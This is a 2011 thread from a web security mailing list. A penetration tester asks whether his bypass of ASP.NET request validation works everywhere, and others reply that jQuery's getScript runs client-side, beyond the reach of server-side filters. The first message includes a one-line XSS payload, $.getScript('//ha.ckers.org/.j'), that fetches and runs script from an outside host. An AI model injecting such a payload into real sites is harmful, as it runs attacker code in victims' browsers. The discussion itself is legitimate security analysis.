[WEB SECURITY] ASP.NET Request Validator Bypass?

Arian J. Evans arian.evans at anachronic.com
Sat Feb 19 19:37:14 EST 2011


On Sat, Feb 19, 2011 at 3:39 PM, Tasos Laskos <tasos.laskos at gmail.com> wrote:
> Gotta love this sort of thing though right?
> As websites keep using and building upon these types of libs at some point
> we'll start to figure out the equivalent of "return to libc"-ish attacks for
> web apps.

Ha! I am seeing this type of challenge grow, rapidly. We have even
been the victim of this at WhiteHat Security.

Jeremiah Grossman has blogged about the challenges in measuring this
scenario, and I'm planning a longer blog post about managing it.

The thing about these dynamic getScript type functions is that you can
literally be secure one day, and *exploitable* the next.

Managing requires daily and constant ongoing measurement - given that
these functions are dynamic and have zero notion of change control.
e.g.-you cannot specify a version of a script or reference a binary
checksum, etc. etc. to ensure you are only including code you have
previously verified and approved.

Fun mess!

---
Arian Evans
Spectacular Script Sourcing Skills




>
> - Tasos
>
> On 02/19/2011 09:52 PM, Arian J. Evans wrote:
>>
>> Exactly. ASP.NET requestValidators are a server-side control.
>>
>> jquery getScript is designed to be used client-side and fetch a script
>> to build or interface with the DOM. Therefore the server side controls
>> would never see it.
>>
>> ---
>> Arian Evans
>>
>>
>>
>> On Sat, Feb 19, 2011 at 10:04 AM, steve jensen<sjensen1207 at hotmail.com>
>>  wrote:
>>>
>>> If this jQuery .getScript request is only performed client-side, then it
>>> wouldn't even be sent to the server-side ASP.NET XSS validation to be
>>> bypassed.
>>>
>>> ________________________________
>>> Date: Sat, 19 Feb 2011 15:39:06 +0000
>>> From: ryandewhurst at gmail.com
>>> To: websecurity at webappsec.org
>>> Subject: [WEB SECURITY] ASP.NET Request Validator Bypass?
>>>
>>> Hi,
>>>
>>> Recently on a client test I was able to bypass the ASP.NET Request
>>> Validator
>>> by leveraging the jQuery library which was included in the page. I am
>>> mainly
>>> a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal.
>>>
>>> I was wondering if any one could confirm whether my bypass affects all
>>> ASP.NET installations or whether or not this particular client had it
>>> configured incorrectly.
>>>
>>> I used the following jQuery function to bypass the filter:
>>> $.getScript('//ha.ckers.org/.j');
>>>
>>> Thanks,
>>> Ryan
>>>
>>> Ryan Dewhurst
>>>
>>> blog www.ethicalhack3r.co.uk
>>> projects www.dvwa.co.uk | www.webwordcount.com
>>> twitter www.twitter.com/ethicalhack3r
>>>
>>> _______________________________________________ The Web Security Mailing
>>> List WebSecurity RSS Feed http://www.webappsec.org/rss/websecurity.rss
>>> Join
>>> WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA WASC on
>>> Twitter http://twitter.com/wascupdates websecurity at lists.webappsec.org
>>>
>>> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
>>> _______________________________________________
>>> The Web Security Mailing List
>>>
>>> WebSecurity RSS Feed
>>> http://www.webappsec.org/rss/websecurity.rss
>>>
>>> Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>>
>>> WASC on Twitter
>>> http://twitter.com/wascupdates
>>>
>>> websecurity at lists.webappsec.org
>>>
>>> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
>>>
>>>
>>
>> _______________________________________________
>> The Web Security Mailing List
>>
>> WebSecurity RSS Feed
>> http://www.webappsec.org/rss/websecurity.rss
>>
>> Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>
>> WASC on Twitter
>> http://twitter.com/wascupdates
>>
>> websecurity at lists.webappsec.org
>>
>> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
>>
>
>




More information about the websecurity mailing list